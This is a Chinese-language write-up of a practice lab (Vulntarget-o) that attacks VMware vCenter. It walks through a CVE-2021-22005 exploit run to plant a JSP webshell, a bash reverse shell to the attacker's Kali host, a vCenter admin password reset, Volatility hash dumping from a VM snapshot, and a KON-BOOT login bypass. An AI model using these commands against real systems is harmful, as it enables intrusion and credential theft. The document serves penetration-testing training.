【VMware vCenter 靶场环境】 Vulntarget-o 实战打靶write up

更新时间：2025年07月31日04:54:19

1. 拓扑结构

esxi ：192.168.10.128 
● 账号：root 
● 密码：Vulntarget@123
vcenter：192.168.10.129
● 账号：administrator@vsphere.local
● 密码：Admin@vulntarget123
Windows7：192.168.10.*（dhcp）
● 账号：vulntarget
● 密码：Vulntarget

2. 打靶要求

本次主机中，不以获取flag为目标，旨为不限制方法，鼓励尝试多种方法来练习，不限于：

• 获取vcenter root权限

• 后渗透获取数据

希望你能够利用好这个靶机，掌握vcenter的相关渗透方法。

下载地址：
百度云链接: https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg
提取码: 2dwq
夸克网盘：
链接：https://pan.quark.cn/s/e65bf3efbf0b?pwd=GHgE 提取码：GHgE

3. 打靶环境准备

攻击机：

• kali linux

• Windows 11

ip地址配置，需要按照要求将虚拟机的ip地址配置为192.168.10.1/24。

4. 打靶

4.1 漏洞扫描

根据ip地址：192.168.10.129进行渗透测试，首先探测端口和服务，在这里简单粗暴点，直接使用fscan：

在这里就不对其他的进行测试了，单刀直入vcenter：

4.2 vcenter打法-CVE-2021-22005

具体的流程可以参考：CVE-2021-22005-VMware vCenter漏洞学习 CVE-2021-22005-VMware vCenter漏洞学习

4.2.1 getshell-root权限

虽然在fscan里面扫到了是CVE-2021-21972的漏洞，但是CVE-2021-21972拿到的权限并不直接是root的，还需要提权，非常麻烦，所以在这里使用CVE-2021-22005的试一下，因为这个版本也可能存在这个漏洞。

漏洞脚本：https://github.com/shmilylty/cve-2021-22005-exp

python3 exp.py -s hello.jsp -t https://192.168.10.129/

CVE-2021-22005漏洞在检测上可能存在误报的情况，直接访问一下看看：

此时可以访问成功，证明没有问题，确实存在CVE-2021-22005的这个漏洞。

那就直接拿shell吧，在这里使用哥斯拉生成一个jsp的木马，然后执行后连接：

此时连接成功：

CVE-2021-22005漏洞的好处就是上来就是root：

4.2.2 重置管理员密码

在这里使用最简单的方法，直接重置管理员密码。

但是注意在实战中，最好不要使用这个方法，因为重置管理员密码的话，管理员就无法登录了，这是下下策！

---

#Linux 
/usr/lib/vmware-vmdir/bin/vdcadmintool 

#Windows 
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe

先反弹shell过来，反弹到kali上：

bash -i >& /dev/tcp/192.168.10.134/8888 0>&1

直接在shell上修改：

直接进去了：

4.3 vcenter后渗透-打快照下载-失败

现在需要进入到Windows7的桌面上去。

这部分可以参考：【实战】记一次攻防演练之vcenter后渗透利用 【实战】记一次攻防演练之vcenter后渗透利用

在这里获取hash有两个大方向：

• 做快照，下载快照，用Volatility来取证获取hash（适合网速比较快的）

• 做克隆，cd盘启动，抓hash

目前需要获取当前Windows7机器里面的flag，进入到环境中，但是因为有密码，所以在这里只能够本地分析，或者是制作启动盘。

这种适合网速不错、能短时间下载下来的。

这个虚拟机快照很快就做好了，然后去存储位置里面去找，下载文件：

把这个vmem下载到本地，使用volatility分析一下：

这部分内容可以参考：内存取证工具Volatility学习 内存取证工具Volatility学习

volatility_2.6_win64_standalone.exe -f windows7-Snapshot1.vmem imageinfo

现在知道了机器是这个的，所以直接尝试获取hash信息：

volatility_2.6_win64_standalone.exe -f windows7-Snapshot1.vmem --profile=Win7SP1x64 hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vulntarget:1001:aad3b435b51404eeaad3b435b51404ee:0015e78be23894dbcb9eb9f79e188039:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:bfefbc11176f2678ff410c7a611d8d0b:::

尝试解密失败：

其实这个密码是Vulntarget，应该是解不出来，能否获取明文呢？

大家有需要的可以参考：取证工具volatility插件版学习记录 取证工具volatility插件版学习记录

我在这里就不做这个了（懒），在这里使用另外一种方法，直接重置密码。

4.4 vcenter后渗透-克隆虚拟机-成功

在这里使用cd引导来破除密码啥的，意思就是你电脑关机了，再开机的时候，先把usb或者cd启动，把密码抹掉，类似于我们使用的大白菜装机大师。

可参考：【实战】记一次攻防演练之vcenter后渗透利用 【实战】记一次攻防演练之vcenter后渗透利用

4.4.1 kon-boot文件上传

先看下Windows7机器的位置，把你做好的kon-boot的iso文件上传上去：

可以从网上下载老版本的：

链接：https://pan.baidu.com/s/14_OP_nePf-HUlkZxzwXkXw 
提取码：k32k

将KON-BOOT的iso镜像（非常的小）上传到vcenter的某一个磁盘中，克隆虚拟机，将克隆的CD/DVD处镜像更换成KON-BOOT的iso文件，再启动。

4.4.2 克隆虚拟机

在这里选择克隆到虚拟机：

起个名字，然后放在下面，下一步：

随便放，下一步：

在这里选择克隆选项：

把网卡都取消：

选择这个镜像iso文件：

点击完成之后，克隆需要等待一会，我这边只有一个盘，而且还是ssd的，所以快一点：

4.4.3 无网络开启克隆机器

在开启之前，编辑设置，对vm虚拟机设置：

在这里注意需要勾选强制执行BIOS设置：

并且记得需要开启是硬件连接，开机之后，选择启动web控制台：

启动之后，在bios界面，使用+-符号来移动顺序，mac上只能用-来移动，将cd作为第一个，然后f10保存即可。

启动之后会有界面：

到这个界面之后，5下shift进入命令行：

此时是system权限：

• 如果是只为了获取桌面的文件什么的，在这里就可以命令行搜索，也可以新建一个用户进去也可以。

• 如果想知道vulntarget用户的真实密码，在这里可以新建一个管理员用户进入桌面，然后再通过mimikatz来获取真实密码（Windows10以上系统默认情况下无法直接获取明文）。

在这里就新建一个用户进去吧：

但比较扯淡的是这个win7的系统，无法切换用户名登录，当然在这里可以关机之后，再开启机器就可以选择登录了：

另外一种就是直接重置vulntarget用户的密码。。。

那就直接登录：

5. 总结

Vulntarget-o里面主要是练习Vcenter的漏洞利用、后渗透技术等，本文只用了一些简单粗暴的方法来完成打靶任务，希望各位师傅能够多试试其他的方法，巩固练习提升自己。